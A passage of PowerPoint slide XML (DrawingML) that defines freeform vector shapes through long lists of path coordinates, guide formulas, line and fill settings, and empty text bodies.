                    <a:lnTo>
                      <a:pt x="264" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="182"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36390" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2926" y="3015"/>
                <a:ext cx="195" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 195"/>
                  <a:gd name="T1" fmla="*/ 1 h 219"/>
                  <a:gd name="T2" fmla="*/ 16 w 195"/>
                  <a:gd name="T3" fmla="*/ 8 h 219"/>
                  <a:gd name="T4" fmla="*/ 12 w 195"/>
                  <a:gd name="T5" fmla="*/ 17 h 219"/>
                  <a:gd name="T6" fmla="*/ 8 w 195"/>
                  <a:gd name="T7" fmla="*/ 15 h 219"/>
                  <a:gd name="T8" fmla="*/ 9 w 195"/>
                  <a:gd name="T9" fmla="*/ 27 h 219"/>
                  <a:gd name="T10" fmla="*/ 19 w 195"/>
                  <a:gd name="T11" fmla="*/ 24 h 219"/>
                  <a:gd name="T12" fmla="*/ 30 w 195"/>
                  <a:gd name="T13" fmla="*/ 23 h 219"/>
                  <a:gd name="T14" fmla="*/ 52 w 195"/>
                  <a:gd name="T15" fmla="*/ 23 h 219"/>
                  <a:gd name="T16" fmla="*/ 71 w 195"/>
                  <a:gd name="T17" fmla="*/ 23 h 219"/>
                  <a:gd name="T18" fmla="*/ 76 w 195"/>
                  <a:gd name="T19" fmla="*/ 25 h 219"/>
                  <a:gd name="T20" fmla="*/ 81 w 195"/>
                  <a:gd name="T21" fmla="*/ 43 h 219"/>
                  <a:gd name="T22" fmla="*/ 92 w 195"/>
                  <a:gd name="T23" fmla="*/ 58 h 219"/>
                  <a:gd name="T24" fmla="*/ 112 w 195"/>
                  <a:gd name="T25" fmla="*/ 56 h 219"/>
                  <a:gd name="T26" fmla="*/ 123 w 195"/>
                  <a:gd name="T27" fmla="*/ 47 h 219"/>
                  <a:gd name="T28" fmla="*/ 124 w 195"/>
                  <a:gd name="T29" fmla="*/ 40 h 219"/>
                  <a:gd name="T30" fmla="*/ 139 w 195"/>
                  <a:gd name="T31" fmla="*/ 45 h 219"/>
                  <a:gd name="T32" fmla="*/ 156 w 195"/>
                  <a:gd name="T33" fmla="*/ 45 h 219"/>
                  <a:gd name="T34" fmla="*/ 157 w 195"/>
                  <a:gd name="T35" fmla="*/ 52 h 219"/>
                  <a:gd name="T36" fmla="*/ 160 w 195"/>
                  <a:gd name="T37" fmla="*/ 63 h 219"/>
                  <a:gd name="T38" fmla="*/ 158 w 195"/>
                  <a:gd name="T39" fmla="*/ 80 h 219"/>
                  <a:gd name="T40" fmla="*/ 167 w 195"/>
                  <a:gd name="T41" fmla="*/ 93 h 219"/>
                  <a:gd name="T42" fmla="*/ 165 w 195"/>
                  <a:gd name="T43" fmla="*/ 105 h 219"/>
                  <a:gd name="T44" fmla="*/ 177 w 195"/>
                  <a:gd name="T45" fmla="*/ 105 h 219"/>
                  <a:gd name="T46" fmla="*/ 191 w 195"/>
                  <a:gd name="T47" fmla="*/ 114 h 219"/>
                  <a:gd name="T48" fmla="*/ 195 w 195"/>
                  <a:gd name="T49" fmla="*/ 126 h 219"/>
                  <a:gd name="T50" fmla="*/ 190 w 195"/>
                  <a:gd name="T51" fmla="*/ 136 h 219"/>
                  <a:gd name="T52" fmla="*/ 162 w 195"/>
                  <a:gd name="T53" fmla="*/ 137 h 219"/>
                  <a:gd name="T54" fmla="*/ 161 w 195"/>
                  <a:gd name="T55" fmla="*/ 178 h 219"/>
                  <a:gd name="T56" fmla="*/ 162 w 195"/>
                  <a:gd name="T57" fmla="*/ 192 h 219"/>
                  <a:gd name="T58" fmla="*/ 177 w 195"/>
                  <a:gd name="T59" fmla="*/ 208 h 219"/>
                  <a:gd name="T60" fmla="*/ 161 w 195"/>
                  <a:gd name="T61" fmla="*/ 217 h 219"/>
                  <a:gd name="T62" fmla="*/ 140 w 195"/>
                  <a:gd name="T63" fmla="*/ 219 h 219"/>
                  <a:gd name="T64" fmla="*/ 120 w 195"/>
                  <a:gd name="T65" fmla="*/ 217 h 219"/>
                  <a:gd name="T66" fmla="*/ 108 w 195"/>
                  <a:gd name="T67" fmla="*/ 213 h 219"/>
                  <a:gd name="T68" fmla="*/ 96 w 195"/>
                  <a:gd name="T69" fmla="*/ 209 h 219"/>
                  <a:gd name="T70" fmla="*/ 61 w 195"/>
                  <a:gd name="T71" fmla="*/ 209 h 219"/>
                  <a:gd name="T72" fmla="*/ 32 w 195"/>
                  <a:gd name="T73" fmla="*/ 208 h 219"/>
                  <a:gd name="T74" fmla="*/ 23 w 195"/>
                  <a:gd name="T75" fmla="*/ 202 h 219"/>
                  <a:gd name="T76" fmla="*/ 10 w 195"/>
                  <a:gd name="T77" fmla="*/ 208 h 219"/>
                  <a:gd name="T78" fmla="*/ 0 w 195"/>
                  <a:gd name="T79" fmla="*/ 207 h 219"/>
                  <a:gd name="T80" fmla="*/ 0 w 195"/>
                  <a:gd name="T81" fmla="*/ 183 h 219"/>
                  <a:gd name="T82" fmla="*/ 6 w 195"/>
                  <a:gd name="T83" fmla="*/ 173 h 219"/>
                  <a:gd name="T84" fmla="*/ 11 w 195"/>
                  <a:gd name="T85" fmla="*/ 151 h 219"/>
                  <a:gd name="T86" fmla="*/ 18 w 195"/>
                  <a:gd name="T87" fmla="*/ 135 h 219"/>
                  <a:gd name="T88" fmla="*/ 27 w 195"/>
                  <a:gd name="T89" fmla="*/ 128 h 219"/>
                  <a:gd name="T90" fmla="*/ 33 w 195"/>
                  <a:gd name="T91" fmla="*/ 110 h 219"/>
                  <a:gd name="T92" fmla="*/ 30 w 195"/>
                  <a:gd name="T93" fmla="*/ 93 h 219"/>
                  <a:gd name="T94" fmla="*/ 21 w 195"/>
                  <a:gd name="T95" fmla="*/ 76 h 219"/>
                  <a:gd name="T96" fmla="*/ 26 w 195"/>
                  <a:gd name="T97" fmla="*/ 69 h 219"/>
                  <a:gd name="T98" fmla="*/ 26 w 195"/>
                  <a:gd name="T99" fmla="*/ 58 h 219"/>
                  <a:gd name="T100" fmla="*/ 17 w 195"/>
                  <a:gd name="T101" fmla="*/ 41 h 219"/>
                  <a:gd name="T102" fmla="*/ 9 w 195"/>
                  <a:gd name="T103" fmla="*/ 28 h 219"/>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95"/>
                  <a:gd name="T157" fmla="*/ 0 h 219"/>
                  <a:gd name="T158" fmla="*/ 195 w 195"/>
                  <a:gd name="T159" fmla="*/ 219 h 219"/>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95" h="219">
                    <a:moveTo>
                      <a:pt x="4" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36391" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2930" y="3015"/>
                <a:ext cx="16" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 8 h 20"/>
                  <a:gd name="T2" fmla="*/ 3 w 16"/>
                  <a:gd name="T3" fmla="*/ 5 h 20"/>
                  <a:gd name="T4" fmla="*/ 8 w 16"/>
                  <a:gd name="T5" fmla="*/ 1 h 20"/>
                  <a:gd name="T6" fmla="*/ 11 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 20"/>
                  <a:gd name="T8" fmla="*/ 16 w 16"/>
                  <a:gd name="T9" fmla="*/ 4 h 20"/>
                  <a:gd name="T10" fmla="*/ 12 w 16"/>
                  <a:gd name="T11" fmla="*/ 8 h 20"/>
                  <a:gd name="T12" fmla="*/ 9 w 16"/>
                  <a:gd name="T13" fmla="*/ 10 h 20"/>
                  <a:gd name="T14" fmla="*/ 9 w 16"/>
                  <a:gd name="T15" fmla="*/ 11 h 20"/>
                  <a:gd name="T16" fmla="*/ 8 w 16"/>
                  <a:gd name="T17" fmla="*/ 17 h 20"/>
                  <a:gd name="T18" fmla="*/ 8 w 16"/>
                  <a:gd name="T19" fmla="*/ 18 h 20"/>
                  <a:gd name="T20" fmla="*/ 3 w 16"/>
                  <a:gd name="T21" fmla="*/ 20 h 20"/>
                  <a:gd name="T22" fmla="*/ 4 w 16"/>
                  <a:gd name="T23" fmla="*/ 15 h 20"/>
                  <a:gd name="T24" fmla="*/ 3 w 16"/>
                  <a:gd name="T25" fmla="*/ 14 h 20"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 8 h 2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6"/>
                  <a:gd name="T43" fmla="*/ 0 h 20"/>
                  <a:gd name="T44" fmla="*/ 16 w 16"/>
                  <a:gd name="T45" fmla="*/ 20 h 2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6" h="20">
                    <a:moveTo>
                      <a:pt x="0" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
